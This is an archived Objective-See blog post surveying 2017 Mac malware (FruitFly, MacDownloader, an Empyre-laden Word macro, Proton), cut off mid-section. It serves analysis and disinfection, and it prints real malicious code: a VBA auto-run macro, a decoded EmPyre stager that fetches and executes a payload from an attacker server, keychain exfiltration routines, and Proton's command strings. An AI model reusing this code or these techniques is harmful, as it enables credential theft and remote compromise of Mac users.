{
	"id": "6135a931-c738-4555-8de5-ca250ec09c80",
	"created_at": "2026-04-06T00:09:44.735785Z",
	"updated_at": "2026-04-10T03:37:50.666626Z",
	"deleted_at": null,
	"sha1_hash": "62e8e695a08a7e3c1db4e245db414809b38dd968",
	"title": "Mac Malware of 2017",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6331917,
	"plain_text": "Mac Malware of 2017\r\nArchived: 2026-04-05 21:16:10 UTC\r\nMac Malware of 2017\r\n› a comprehensive analysis of the new mac malware of '17\r\nlove these blog posts? support my tools \u0026 writing on patreon :)\r\nIntroduction\r\nHooray, it's almost the new year! 2018 is going to be incredible, right? ...right?\r\nFor the second year in a row, I've decided to post a blog that comprehensively covers all the new Mac malware that appeared\r\nduring the course of the year. While the specimens may have been briefly reported on before (i.e. by the AV company that\r\ndiscovered them), this blog aims to cumulatively cover all new Mac malware of 2017 - in one place. For each, we'll dive\r\ninto various technical details such as identifying the malware's infection vector, persistence mechanism, features \u0026 goals,\r\nand describe how to clean an infected system.\r\nThis year, I've decided to start 'early' and add one or two malware specimens each day, until the blog post is complete. So\r\ncheck back each day, or follow Objective-See on twitter for updates!\r\nBy the way, if you want to play along, all samples can be downloaded from Objective-See's malware page.\r\nBy downloading the samples, you waive all rights to claim punitive, incidental and consequential damages resulting from\r\nmishandling or self-infection!\r\nAlso, the 'disinfection' instructions provided in this blog are specific to each malware specimen. Often malware can install\r\nother malware, or allow a remote attacker to do whatever they want. 
Thus if you were/are infected by any of these\r\nsamples, it's suggested you fully re-install macOS.\r\nTimeline\r\nA fully-featured backdoor, designed to perversely spy on Mac users\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 1 of 67\n\nIranian macOS exfiltration agent, targeting the 'defense industrial base' and human rights advocates.\r\nThe open-source macOS backdoor, 'Empyre', maliciously packaged into a macro'd Word document\r\nA fully-featured macOS backdoor, designed to collect and exfiltrate sensitive user data such as 1Password files,\r\nbrowser login data, and keychains.\r\nAPT28's second-stage persistent macOS backdoor.\r\nA barely functional piece of macOS ransomware, written in Swift.\r\nA banking trojan that redirects an infected user's web traffic in order to extract banking credentials.\r\nA port of a highly sophisticated Windows backdoor; currently the Mac version appears incomplete and lacking\r\nfeatures...for now!\r\nStandard macOS backdoor, offered via a 'malware-as-a-service' model.\r\nA basic piece of macOS ransomware, offered via a 'malware-as-a-service' model.\r\nA crypto-currency miner, distributed via a trojaned 'CS-GO' hack.\r\nA macOS crypto-currency mining trojan.\r\nOSX/FruitFly:\r\n FruitFly\r\nfound: January, by MalwareBytes\r\ninfection: unknown\r\nfeatures: perversely spy on users\ndisinfection: remove launch agent\nwriteups:\n\"New Mac backdoor using antiquated code\" (MalwareBytes)\n\"Dissecting OSX/FruitFly.B via a custom C\u0026C server\" (P. Wardle)\nOSX/FruitFly, the first Mac malware discovered in 2017, was designed to stealthily spy on 'everyday' Mac users via their\nwebcams. Due to its longevity and perverse goals it was covered extensively in the media (e.g. see: 'Mysterious Mac Malware\nHas Infected Victims for Years').\n infection vector:\nThe infection vector for FruitFly was never uncovered. 
However due to ongoing research and law-enforcement involvement,\nhopefully the mechanism by which the malware infected Mac users will eventually be revealed. In the meantime, it seems\nplausible that the malware may have infected users via common infection vectors such as email, trojanized applications, or\nmalicious ads/popups (that trick users into downloading \u0026 executing the malware):\n persistence:\nWhat is known is that FruitFly persists as a launch agent. Specifically it creates a property list (plist) file in the\n~/Library/LaunchAgents/ directory. For variant 'A', this file is named com.client.client.plist:\n$ cat ~/Library/LaunchAgents/com.client.client.plist\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n(plist body, keys and values as recoverable from the extracted listing: KeepAlive; Label = com.client.client; ProgramArguments = /Users/user/.client; RunAtLoad; NSUIElement = 1)\nAs the plist sets the RunAtLoad key to true, macOS will automatically execute whatever is specified in the\nProgramArguments key whenever the user logs in. In the case of FruitFly this is the backdoor's main component:\n/Users/user/.client. 
(Note: for variant 'B', the file is named 'fpsaud').\nBy using a tool such as KnockKnock, which displays persistently installed software, it's trivial to reveal FruitFly's persistent\ncomponent (here, OSX/FruitFly.B's 'fpsaud'):\n features:\nThe main component of OSX/FruitFly is an obfuscated perl script:\n$ cat fpsaud\n#!/usr/bin/perl use strict;use warnings;use IO::Socket;use IPC::Open2;my$l;sub G{die if!defined syswrite$l,$_[0]}sub\nJ{my($U,$A)=('','');while($_[0]\u003elength$U){die if!sysread$l,$A,$_[0]-length$U;$U.=$A;}return$U;}sub O{unpack'V',J\n4}sub N{J O}sub H{my$U=N;$U=~s/\\\\/\\//g;$U}sub\nI{my$U=eval{my$C=`$_[0]`;chomp$C;$C};$U=''if!defined$U;$U;}sub K{$_[0]?v1:v0}sub Y{pack'V',$_[0]}sub\nB{pack'V2',$_[0]/2**32,$_[0]%2**32}sub Z{pack'V/a*',$_[0]}sub M{$_[0]^(v3 x\nlength($_[0]))}my($h,@r)=split/a/,M('11b36-301-;;2-45bdql-lwslk-hgjfbdql...\nReverse-engineering this script (which also contains an embedded Mach-O binary) would have been a rather time-consuming\nprocess. Thus I decided to simply create a custom command \u0026 control server in order to coerce the malware to\nreveal its capabilities simply by tasking! If you want to learn more about this, check out the lengthy whitepaper I wrote, or\nwatch my DefCon talk on the topic:\r\nBesides standard backdoor features such as remote access to the file system, system commands and the webcam (variant\r\n'A'), using this analysis technique revealed that the malware would generate and exfiltrate screen captures (as PNGs):\r\nVia a custom mouse and keyboard sniffer I wrote (and open-sourced on GitHub) for this analysis, we can also see that\r\nFruitFly affords a remote attacker the ability to generate both simulated mouse and keyboard events. 
AFAIK, this is the first\r\ntime such a capability has been (publicly) seen in Mac malware!\r\n# ./sniffMK\r\nevent: kCGEventKeyDown\r\nkeycode: 0/0/a\r\nevent: kCGEventKeyUp\r\nkeycode: 0/0/a\r\nevent: kCGEventKeyDown\r\nkeycode: 0xb/11/b\r\nevent: kCGEventKeyUp\r\nkeycode: 0xb/11/b\r\nevent: kCGEventKeyDown\r\nkeycode: 0x8/8/c\r\nevent: kCGEventKeyUp\r\nkeycode: 0x8/8/c\r\nevent: kCGEventLeftMouseDown\r\n(x: 640.230469, y: 624.195312)\r\nevent: kCGEventLeftMouseUp\r\n(x: 640.230469, y: 624.195312)\r\nThe full list of capabilities of OSX/FruitFly.B (revealed via tasking from the custom command \u0026 control server) is shown\r\nbelow:\r\n disinfection:\r\nKnown variants of OSX/FruitFly can be removed from an infected system via the following steps:\r\n1. Unload the malware's persistent launch agent via the 'launchctl unload' command:\r\n$ launchctl unload ~/Library/LaunchAgents/com.client.client.plist\r\n2. Remove the malicious launch agent plist file ~/Library/LaunchAgents/com.client.client.plist\r\n3. Remove the malware's persistent perl script \u0026 file. Depending on the variant, this file may be:\r\n~/.client or ~/fpsaud\r\nOSX/MacDownloader (iKitten):\r\n MacDownloader (iKitten)\r\nfound: February, by Claudio Guarnieri/Collin Anderson ('Iran Threats')\r\ninfection: fake Adobe Flash player\r\nfeatures: exfiltration of user data, such as keychain\r\ndisinfection: remove malicious app (persistence code is broken)\r\nwriteups: \"iKittens: Iranian Actor Resurfaces With Malware For Mac\" (Iran Threats)\r\nOSX/MacDownloader is a simple (incomplete?) macOS exfiltration agent, tied to Iranian offensive cyber operations. 
In their\r\nwriteup, \"iKittens: Iranian Actor Resurfaces With Malware For Mac\", Claudio Guarnieri and Collin Anderson provide a\r\ncomprehensive analysis of the malware.\r\n infection:\r\nAs noted by Claudio and Collin, MacDownloader infections begin with a phishing email. Specifically they state, \"An active\r\nstaging of the MacDownloader agent was first observed linked out from a site impersonating the aerospace firm \"United\r\nTechnologies Corporation,\" a spearphishing site was previously believed to be maintained by Iranian actors for spreading\r\nWindows malware.\" Below is a screenshot of the malicious site (image credit: Claudio/Collin):\r\nAs can be seen, the site contains a link to what purports to be a required plugin for the video player: Adobe Flash. Of course,\r\nthis link points not to a legitimate version of Flash, but to \"either Windows or Mac malware based on the detected operating system.\"\r\nIf the user is tricked into downloading and running the 'flash player' application, they'll become infected with\r\nMacDownloader:\r\nIt should be noted though, that the malicious application (addone flashplayer.app) is unsigned. 
As such, Gatekeeper should\r\nblock the malware from executing - unless the user disables it, or explicitly agrees to allow the unsigned malicious code to\r\nexecute.\r\npersistence:\r\nThe security researchers who discovered and analyzed the application note that, \"it appears that the application contains an\r\nunused attempt to install persistent access to the victim host.\" Digging into the code, we can find a method named\r\naddToStartup that will persist the malware by modifying the /etc/rc.common file, adding a command to execute\r\nsomething named /etc/.checkdev:\r\n-[AppDelegate addToStartup:](void * self, void * _cmd, void * arg2) {\r\n   rax = [0x0 lastPathComponent];\r\n   rax = [rax retain];\r\n   var_20 = [NSString stringWithFormat:@\"if cat /etc/rc.common | grep %@; then sleep 1;\r\n            else echo 'sleep %d \u0026\u0026 %@ \u0026' \u003e\u003e /etc/rc.common; fi \", rax, 0x78, 0x0];\r\n   [[[CUtils ExecuteBash:var_20] retain] release];\r\n   ...\r\n}\r\nIn 2014 I wrote a paper titled, \"Methods of Malware Persistence on OS X\", where I discussed using /etc/rc.common for\r\npersistence, noting:\r\n\"RC scripts are used in another BSD-flavoured persistence technique that works on OS X, allowing scripts or commands to\r\nautomatically be executed. 
For example, the rc.common file can be edited to insert arbitrary commands that will\r\nautomatically execute when OS X starts.\"\r\nIt's kind of neat to see a piece of Mac malware (ab)using this method for persistence!\r\nGood news though: KnockKnock, which displays persistently installed software, can detect that the rc.common file has been\r\nmaliciously modified:\r\nfeatures:\r\nThe main goal of OSX/MacDownloader is to survey and collect/exfiltrate sensitive data from an infected target.\r\nClaudio/Collin state:\r\n\"MacDownloader harvests information on the infected system, including the user's active Keychains, which are then\r\nuploaded to the C2. The dropper also documents the running processes, installed applications, and the username and\r\npassword which are acquired through a fake System Preferences dialog.\"\r\nDuring install, the malware displays a fake authentication prompt to collect the user's credentials. 
Assuming the user is\r\nrunning in the default context of an administrator account, this will give the malware the ability to perform privileged\r\nactions as well as unlock encrypted data in the user's keychain:\r\nDumping the Objective-C class information via jtool, we see methods responsible for the collection:\r\n$ ./jtool -d objc -v \"addone flashplayer.app/Contents/MacOS/Bitdefender Adware Removal Tool\"\r\n@interface AuthenticationController :\r\n// 11 instance methods\r\n/* 0 - 0x1000049b0 */ - getLocalIPAddress;\r\n/* 1 - 0x100004fd0 */ - getRunningProcessList;\r\n/* 2 - 0x100005380 */ - getInstalledApplicationsList;\r\n/* 3 - 0x1000059b0 */ - getKeychainsFilePath;\r\n...\r\nTaking a closer look at the 'getRunningProcessList' method reveals the malware simply invokes the [NSWorkspace\r\nsharedWorkspace]'s 'runningApplications' method:\r\n-[AuthenticationController getRunningProcessList](void * self, void * _cmd) {\r\n   var_A0 = [[NSMutableArray alloc] init];\r\n   rax = [NSWorkspace sharedWorkspace];\r\n   var_A8 = [[rax runningApplications] retain];\r\n   rax = [rax countByEnumeratingWithState:var_F0 objects:var_88 count:0x10];\r\n   do {\r\n      ...\r\n      var_F8 = [[NSString stringWithFormat:@\"process name is: %@\\t PID: %d\r\n               Run from: %@\", var_150, var_154, rax] retain];\r\n      [var_A0 addObject:var_F8];\r\n      ...\r\nIt should be noted that this method simply returns a list of applications running in the context of the user...not all running\r\nprocesses!\r\nThe malware saves survey information, user credentials, installed apps, and running applications in a file named\r\n/tmp/applist.txt:\r\n$ cat /tmp/applist.txt\r\n\"OS version: Darwin users-Mac.local 16.7.0 Darwin Kernel Version 16.7.0: Thu Jun 15 17:36:27 PDT 2017; root:xnu-3789.70.16~2\\/RELEASE_X86_64 x86_64\",\r\n\"Root Username: \\\"user\\\"\",\r\n\"Root Password: 
\\\"hunter2\\\"\",\r\n...\r\n[\r\n\"Applications\\/App%20Store.app\\/\",\r\n\"Applications\\/Automator.app\\/\",\r\n\"Applications\\/Calculator.app\\/\",\r\n\"Applications\\/Calendar.app\\/\",\r\n\"Applications\\/Chess.app\\/\",\r\n...\r\n]\r\n\"process name is: Dock\\t PID: 254 Run from: file:\\/\\/\\/System\\/Library\\/CoreServices\\/Dock.app\\/Contents\\/MacOS\\/Dock\",\r\n\"process name is: Spotlight\\t PID: 300 Run from:\r\nfile:\\/\\/\\/System\\/Library\\/CoreServices\\/Spotlight.app\\/Contents\\/MacOS\\/Spotlight\",\r\n\"process name is: Safari\\t PID: 972 Run from: file:\\/\\/\\/Applications\\/Safari.app\\/Contents\\/MacOS\\/Safari\",\r\n...\r\nIn order to grab the keychains of the infected system, the malware zips everything from the /Library/Keychains/ directory\r\ninto the /etc/kcbackup.cfg file:\r\n$ zip -rj /etc/kcbackup.cfg /Library/Keychains/\r\nadding: apsd.keychain (deflated 58%)\r\nadding: System.keychain (deflated 70%)\r\nThe malware exfiltrates the collected data to a command \u0026 control server, by invoking the\r\n'SendCollectedDataTo:withThisTargetId:' method, which in turn invokes the 'uploadFile:ToServer:withTargetId:' method:\r\n-[AuthenticationController SendCollectedDataTo:withThisTargetId:](void * self, void * _cmd, void * arg2, void * arg3) {\r\n   ...\r\n   if (([CUtils hasInternet:0x0] \u0026 0x1 \u0026 0xff) != 0x0) {\r\n      ...\r\n      var_120 = [@\"/tmp/applist.txt\" retain];\r\n      [CUtils uploadFile:var_120 ToServer:0x0 withTargetId:0x0];\r\n      ...\r\n   }\r\n}\r\n disinfection:\r\n\"Features such as persistence do not appear to work\" ... note the security researchers who analyzed the sample. 
Thus in\r\ntheory simply killing the malicious app (addone flashplayer.app), or rebooting an infected system, should 'remove' the\r\nmalware.\r\n$ ps aux | grep flash\r\nuser 666 /Users/user/Desktop/addone flashplayer.app\r\n$ kill -9 666\r\nHowever, if the malware was able to run it likely already collected and exfiltrated one's credentials and keychains - so, kind\r\nof game over :(\r\nOn the off chance the malware was able to persist, the final line of the rc.common file will contain a command that executes\r\na malicious script: /etc/.checkdev. Delete this command and the .checkdev file, to remove the persistent infection!\r\nMacro'd Word Document (w/ Empyre):\r\n Macro'd Word Document (w/ Empyre)\r\nfound: February, by Snorre Fagerland (@fstenv)\r\ninfection: Malicious Word document\r\nfeatures: via Empyre; full remote command and control of an infected host\r\ndisinfection: remove: launch item/cronjob/login hook/etc.\r\nwriteups: \"New Attack, Old Tricks\" (P. Wardle/Objective-See)\r\nThough unnamed by the anti-virus community, this malicious Word document targeted Mac users in an attempt to surreptitiously\r\ninstall Empyre (an open-source macOS post-exploitation agent).\r\n infection:\r\nOn February 6th, Snorre Fagerland (@fstenv) tweeted the following:\r\n...so we have a malicious word document circulating in the wild, targeting macOS users. Neat!\r\nI grabbed the sample (\"U.S. 
Allies and Rivals Digest Trump's Victory - Carnegie Endowment for International Peace.docm\")\r\nfrom VirusTotal (see here), noting that at the time only four AV engines flagged the Word document as malicious:\r\nOpening the document in Microsoft Word (version 2011, within an isolated macOS VM) triggered a \"this document\r\ncontains macros\" warning:\r\nIf a macOS user opened this document in Microsoft Word, and disregarded this warning...they'd become infected!\r\nAs noted online, recent Word documents are actually \"XML files stored in Zip archives\"...and that \"VBA macros are usually\r\nstored in a binary OLE file within the Zip archive, called vbaProject.bin.\"\r\nTo extract and analyze the malicious embedded macros, one can use ClamAV's sigtool:\r\n$ unzip \"U.S. Allies and Rivals Digest Trump's Victory - Carnegie Endowment for International Peace.docm\"\r\n  inflating: [Content_Types].xml\r\n  inflating: _rels/.rels\r\n  inflating: word/_rels/document.xml.rels\r\n  inflating: word/document.xml\r\n  inflating: word/theme/theme1.xml\r\n  inflating: word/vbaProject.bin\r\n  ...\r\n$ sigtool --vba word/vbaProject.bin\r\n-------------- start of code ------------------\r\nAttribute VB_Name = \"ThisDocument\"\r\nAttribute VB_Base = \"1Normal.ThisDocument\"\r\nAttribute VB_GlobalNameSpace = False\r\n...\r\nSub autoopen()\r\nFisher\r\nEnd Sub\r\n....\r\nPublic Declare Function system Lib \"libc.dylib\" (ByVal command As String) As Long\r\nPublic Sub Fisher()\r\nDim result As Long\r\nDim cmd As String\r\ncmd = \"ZFhGcHJ2c2dNQlNJeVBmPSdhdGZNelpPcVZMYmNqJwppbXBvcnQgc3\"\r\ncmd = cmd + \"NsOwppZiBoYXNhdHRyKHNzbCwgJ19jcmVhdGVfdW52ZXJpZm\"\r\ncmd = cmd + \"llZF9jb250ZXh0Jyk6c3NsLl9jcmVhdGVfZGVmYXVsdF9odH\"\r\ncmd = cmd + \"Rwc19jb250ZXh0ID0gc3NsLl9jcmVhdGVfdW52ZXJpZmllZF\"\r\ncmd = cmd + \"9jb250ZXh0OwppbXBvcnQgc3lzLCB1cmxsaWIyO2ltcG9ydC\"\r\n....\r\ncmd = cmd + 
\"BlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl\"\r\ncmd = cmd + \"0pKQpleGVjKCcnLmpvaW4ob3V0KSk=\"\r\nresult = system(\"echo \"\"import sys,base64;exec(base64.b64decode(\\\"\" \" \u0026 cmd \u0026 \" \\\"\"));\"\" | python \u0026\")\r\nEnd Sub\r\nAccording to Microsoft, as its name suggests, the \"AutoOpen macro runs after you open a new document.\" So whenever a\r\nuser opens this document on a Mac, in Word (assuming macros have been/are enabled), the Fisher function will automatically\r\nbe executed.\r\nThe Fisher function decodes a base64 chunk of data (stored in the cmd variable) then executes it via python. Using python's\r\nbase64 module we can easily decode the data:\r\n$ python\r\n\u003e\u003e\u003e import base64\r\n\u003e\u003e\u003e cmd = \"ZFhGcHJ2c2dNQlNJeVBmPSdhdGZNelpPcVZMYmNqJwppbXBv .... \"\r\n\u003e\u003e\u003e base64.b64decode(cmd)\r\n...\r\ndXFprvsgMBSIyPf = 'atfMzZOqVLbcj'\r\nimport ssl;\r\nif hasattr(ssl, '_create_unverified_context'):\r\n   ssl._create_default_https_context = ssl._create_unverified_context;\r\nimport sys, urllib2;\r\nimport re, subprocess;\r\ncmd = \"ps -ef | grep Little\\ Snitch | grep -v grep\"\r\nps = subprocess.Popen(cmd, shell = True, stdout = subprocess.PIPE)\r\nout = ps.stdout.read()\r\nps.stdout.close()\r\nif re.search(\"Little Snitch\", out):\r\n   sys.exit()\r\no = __import__({\r\n   2: 'urllib2',\r\n   3: 'urllib.request'\r\n}[sys.version_info[0]], fromlist = ['build_opener']).build_opener();\r\nUA = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0';\r\no.addheaders = [('User-Agent', UA)];\r\na = o.open('https://www.securitychecking.org:443/index.asp').read();\r\nkey = 'fff96aed07cb7ea65e7f031bd714607d';\r\nS, j, out = range(256), 0, []\r\nfor i in range(256):\r\n   j = (j + S[i] + ord(key[i % len(key)])) % 256\r\n   S[i], S[j] = S[j], S[i]\r\ni = j = 0\r\nfor char in a:\r\n   i = (i + 1) % 256\r\n   j = (j + S[i]) % 
256\r\n   S[i], S[j] = S[j], S[i]\r\n   out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))\r\nexec(''.join(out))\r\nThe decoded python contained in the auto-run macro is pretty simple to read. In short it:\r\n1. checks to make sure Little Snitch is not running\r\n2. downloads a second-stage payload from https://www.securitychecking.org:443/index.asp\r\n3. RC4 decrypts this payload (key: fff96aed07cb7ea65e7f031bd714607d)\r\n4. executes this now decrypted payload\r\nDoes this python code look familiar? Yes! It's taken, almost verbatim, from the open-source EmPyre project. Specifically the\r\nlib/common/stagers.py file:\r\nEmPyre is a \"pure Python post-exploitation agent built on cryptologically-secure communications and a flexible\r\narchitecture.\" Ok, so the attackers are using an open-source multi-stage post-exploitation agent.\r\nAs mentioned above, the goal of the first-stage python code is to download and execute a second-stage component from\r\nhttps://www.securitychecking.org:443/index.asp. Unfortunately this file is now inaccessible. However, this file was likely\r\njust the second-stage component of Empyre (though yes, the attackers could of course download and execute something\r\nelse).\r\nThis 2nd-stage component of Empyre is the persistent agent that, once installed, will complete the infection and afford a\r\nremote attacker continuing access to an infected host.\r\n persistence:\r\nThe malware will only be persisted once the 2nd-stage component has been downloaded and executed from\r\nhttps://www.securitychecking.org:443/index.asp. Assuming this persistent component is indeed Empyre \"stage-two\", how\r\ndoes it persist? 
Well, that's configurable:\r\n(EmPyre) \u003e usemodule persistence\r\nmutli/crontab   osx/CreateHijacker   osx/launchdaemonexecutable   osx/loginhook\r\nSo persistence is likely achieved via a:\r\ncronjob\r\ndylib hijack\r\nlaunch daemon\r\nlogin hook\r\nIf the second-stage component of the malware is persisted as a cronjob or a launch daemon, BlockBlock will detect the\r\npersistence attempt:\r\n...I'll likely update BlockBlock to monitor for persistence thru login items, even though this is a very archaic and deprecated\r\npersistence technique. Regardless, tools such as KnockKnock or Dylib Hijack Scanner will be able to reveal the persistent\r\ncomponent, regardless of how it is installed :)\r\n features:\r\nThe persistent component of EmPyre can also be configured to run a wide range of EmPyre modules (see:\r\nlib/modules/collection/osx). These modules allow the attacker to perform 'standard' backdoor-type activities such as executing\r\narbitrary commands, file exfiltration, and more. However, it also supports a myriad of more nefarious actions such as:\r\nenabling the webcam\r\ndumping the keychain\r\ninstalling a keylogger\r\naccessing a user's browser history\r\n...and much more\r\ndisinfection:\r\nAs the 2nd-stage (persistent) component of this attack was never recovered, we cannot be 100% sure how to clean an\r\ninfected system. However, as noted, it is more than likely that the attackers utilized Empyre's 'stage-two' for persistence,\r\nwhich can only be persisted in a finite number of ways.\r\nThus checking these locations (cronjobs, launch items, etc) for a malicious python script should reveal any persistent\r\ninfection associated with this attack. Such checks can be done manually. 
For example, crontab -l will show installed\r\ncronjobs:\r\n$ crontab -l\r\n@daily ~/Library/Application Support/.malware.py\r\nHowever, it may be easier to use a tool such as KnockKnock which programmatically enumerates items found in such\r\npersistent locations:\r\nProton:\r\n Proton\r\nfound: February, Sixgill (initial report)\r\ninfection: Trojaned 3rd-party macOS applications/fake websites\r\nfeatures: backdoor, with focus on collection and exfiltration of keychains, \u0026 passwords.\r\ndisinfection: remove: launch agent\r\nwriteups:\r\n\"Proton - A New Mac OS Rat\" (SixGill)\r\n\"OSX/Proton.B, a brief analysis, at 6 miles up\" (P. Wardle/Objective-See)\r\n\"OSX/Proton[C] spreading again through supply-chain attack\" (Eset)\r\n\"OSX.Proton[D] spreading through fake Symantec blog\" (MalwareBytes)\r\nInitially discovered in February, OSX/Proton keeps popping up throughout 2017. A 'feature complete' macOS backdoor, it\r\nhas a propensity for stealing sensitive information from infected systems. However, this malware's most unique feature was\r\nits effective and perhaps novel (for macOS) infection vector.\r\n infection:\r\nThe first public mention of Proton comes from a Sixgill blog post titled, \"Proton - A New Mac OS Rat\". In this post, the\r\nresearchers detail the 'discovery' of Proton:\r\n\"[we] encountered a post in one of the leading, closed Russian cybercrime message boards. The author of the thread\r\nannounced a RAT dubbed Proton, intended for installation exclusively on MAC OS devices. The author offered this product\r\nin one of the leading underground cybercrime markets.\"\r\nThough malware offered for sale ('malware as a service') is fairly common in the Windows world, it's less common for\r\nmacOS malware. And in terms of infection, this generally means a 2nd party (i.e. 
the purchaser) is responsible for the vector.\r\nIn 2017, we saw 4 variants of Proton: A-D. While I am unaware of variant A's infection mechanism, the other variants'\r\nmethods of infection are described below.\r\nProton variants 'B' and 'C' both utilized an interesting attack vector in order to infect macOS users. First the attackers gained\r\nunauthorized access to a legitimate 3rd-party application developer's website. Then with such access, they trojaned the\r\nlegitimate application - infecting it with Proton. From that point on, users who downloaded the (now infected) application\r\nfrom the legitimate developer's website would become infected once the application was executed. This rather insidious\r\nattack (often referred to as a \"supply-chain attack\") can successfully infect even security-conscious macOS users!\r\nIn order to propagate Proton variant 'B', a mirror server of the popular open-source video transcoder, HandBrake, was\r\nhacked. Once the HandBrake developers detected (or were alerted about) the infection, the following 'security alert' was\r\nadded to the site:\r\nSECURITY WARNING\r\nAnyone who has downloaded HandBrake on Mac between [02/May/2017 14:30 UTC] and [06/May/2017 11:00 UTC] needs\r\nto verify the SHA1 / 256 sum of the file before running it.\r\nAnyone who has installed HandBrake for Mac needs to verify their system is not infected with a Trojan. You have 50/50\r\nchance if you've downloaded HandBrake during this period.\r\nVariant 'C' of Proton propagated in a similar way. Specifically the attackers gained unauthorized access to 'Eltima' and\r\ntrojanized several applications. It should be noted that for this variant, the attackers signed the trojanized applications with\r\na 'valid' Apple developer ID, meaning macOS malware mitigations such as Gatekeeper would be 'bypassed' (well, more\r\nspecifically, avoided). 
Luckily, the certificate is now revoked:\r\nThe final variant of Proton seen in 2017, variant 'D', targeted Mac users in a less elegant way. As discovered by\r\n@noarfromspace, for this variant the attackers created a fake website that attempted to masquerade as a Symantec blog:\r\nMore details on this can be found in MalwareBytes' blog post titled, \"OSX.Proton spreading through fake Symantec blog\":\r\n\"The fake site contains a blog post about a supposed new version of CoinThief, a piece of malware from 2014. The fake post\r\npromotes a program called 'Symantec Malware Detector' supposedly to detect and remove the malware. Users who\r\ndownload and run the 'Symantec Malware Detector' will instead be infected with malware [OSX/Proton.D]\"\r\n persistence:\r\nProton persists itself as a Launch Agent. Though (AFAIK) all variants persist in a similar manner, let's take a closer look at\r\nvariant B.\r\nFiring up my open-source macOS process monitor (on GitHub: ProcInfo) and executing the infected HandBrake application\r\nresults in the following 'process' events:\r\n[new process]\r\npid=1368\r\nbinary=/Volumes/HandBrake/HandBrake.app/Contents/MacOS/HandBrake\r\nsignatureStatus = \"-67062 (unsigned)\r\n[new process]\r\npid=1371\r\nbinary=/usr/bin/unzip\r\nargs: \"-P\", \"qzyuzacCELFEYiJ52mhjEC7HYl4eUPAR1EEf63oQ5iTkuNIhzRk2JUKF4IXTRdiQ\",\r\n\"/Volumes/HandBrake/HandBrake.app/Contents/Resources/HBPlayerHUDMainController.nib\", \"-d\", \"/tmp\"\r\n[new process]\r\npid=1372\r\nbinary=/usr/bin/open\r\nargs: \"/tmp/HandBrake.app\"\r\nFrom this ProcInfo output, we can see that the infected HandBrake application:\r\n1. unzips Contents/Resources/HBPlayerHUDMainController.nib to /tmp/HandBrake.app. This 'nib' is a password-protected\r\nzip file whose password is:\r\nqzyuzacCELFEYiJ52mhjEC7HYl4eUPAR1EEf63oQ5iTkuNIhzRk2JUKF4IXTRdiQ\r\n2. 
launches (opens) /tmp/HandBrake.app\r\nOnce /tmp/HandBrake.app is launched, it displays a (fake) authentication popup - which is how the malware attempts to\r\nelevate its privileges:\r\nIf the user is tricked into providing a username and password, the malware will install itself (/tmp/HandBrake.app)\r\npersistently as 'activity_agent.app'.\r\nIt does this by creating a Launch Agent plist file (fr.handbrake.activity_agent.plist). Dumping this file, we can see the\r\nmalware has set the RunAtLoad key to true, which will ensure that it is automatically started each time the user logs in:\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\r\n\u003c!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\"\u003e\r\n\u003cplist version=\"1.0\"\u003e\r\n(plist body, keys and values as recoverable from the extracted listing: KeepAlive; ...; ProgramArguments = /Users/user/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent; RunAtLoad)\r\nAs noted, other variants persist in a similar manner, although the name of the Launch Agent plist is different. For example,\nwhen executing variant 'C', BlockBlock detects a persistence attempt, noting that the malware is attempting to persist via\n/Library/LaunchAgents/com.Eltima.UpdaterAgent.plist:\nVariant 'D' persists via a plist file named com.apple.xpcd.plist, also within the /Library/LaunchAgents/ directory.\n features:\nThe original SixGill blog post contains a screen capture of the advertised features of Proton:\nWe can gain more insight into the malware's features by reversing its core binary. 
Specifically, we determine that the\r\nmalware (here, variant 'B') will somewhat 'stealthily' build a path to an encrypted file named '.hash' in its resources directory\r\n(/tmp/HandBrake.app/Contents/Resources/.hash):\r\n//path: /tmp/HandBrake.app/Contents/Resources/.hash\r\nrbx = [NSString stringWithFormat:@\"%@/%@%@%@%@%@\", r13, @\".\", r9, @\"a\", @\"s\", @\"h\"];\r\nThis file is loaded into memory by the malware and then decrypted via a call to [RNDecryptor\r\ndecryptData:withPassword:error:]. The decryption password is\r\n'9fe4a0c3b63203f096ef65dc98754243979d6bd58fe835482b969aabaaec57e':\r\nProcess 486 stopped\r\n* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over\r\nHandBrake`___lldb_unnamed_symbol521$$HandBrake:\r\n-\u003e 0x100017583 \u003c+259\u003e: callq *%r15\r\n0x100017586 \u003c+262\u003e: movq %rax, %rdi\r\n0x100017589 \u003c+265\u003e: callq 0x100049dae\r\n0x10001758e \u003c+270\u003e: movq %rax, %r13\r\n(lldb) po $rdi\r\nRNDecryptor\r\n(lldb) x/s $rsi\r\n0x10004db2b: \"decryptData:withPassword:error:\"\r\n(lldb) po $rcx\r\n9fe4a0c3b63203f096ef65dc98754243979d6bd58fe835482b969aabaaec57e\r\nAnd what is in this encrypted file? A massive list of commands and configuration values.\r\nif [ -f %@/.crd ]; then cat %@/.crd; else echo failure; fi,\r\nif [ -f %@/.ptrun ]; then echo success; fi,\r\ntouch %@/.ptrun;,\r\ncurl,\r\nhttps://%@/kukpxx8lnldxvbma8c4xqtar/auth?B=%@\u0026U=%@\u0026S=%@,\r\necho '%@' | sudo -S echo success;,\r\nrm -rf %@/%@.app %@;,\r\nrm -rf ~/Library/LaunchAgents/%@*; ,\r\ncurl %@ -o %@ \u0026\u0026 sudo chmod 777 %@;,\r\nHandBrake needs to install additional codecs. 
